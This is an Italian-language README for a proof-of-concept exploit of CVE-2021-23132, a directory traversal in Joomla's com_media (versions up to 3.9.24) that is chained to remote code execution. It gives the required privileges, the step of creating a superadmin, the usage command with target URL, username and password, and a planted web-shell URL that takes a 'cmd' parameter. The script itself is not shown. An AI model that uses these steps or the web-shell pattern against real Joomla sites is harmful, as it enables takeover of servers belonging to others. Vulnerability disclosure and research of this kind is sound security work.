
com_media: percorsi consentiti non destinati al caricamento di immagini verso RCE
Percorsi consentiti di com_media non destinati al caricamento di immagini, fino alla RCE.
Directory traversal in com_media fino alla RCE
Le due CVE sono identiche.
PoC (Completo)
Versione interessata: Joomla core <=3.9.24
Requisito utente: account Admin (non Superadmin)
Ottenere accesso: creare un superadmin, quindi attivare la RCE.
Esecuzione remota di codice (RCE) in Joomla
Esegui cve-2021-23132.py con le tue credenziali e accedi al link rce:
http://target/templates/protostar/error.php?cmd=ls
PoC:
python3 cve-2021-23132.py -url http://192.168.72.140 -u admin -p 1234 -rce 1 -cmd ls

Ho scritto la PoC per poter usare la modalità Directory Traversal o RCE.
Ho usato Directory Traversal per attivare la RCE.
Puoi usare python3 cve-2021-23132.py -h per sapere come usare la PoC.
Nota: assicurati di usare python3 e di installare lmxl con pip3 install lxml
Per favore, utilizza le tue ricerche e contribuisci a rendere Joomla più sicuro.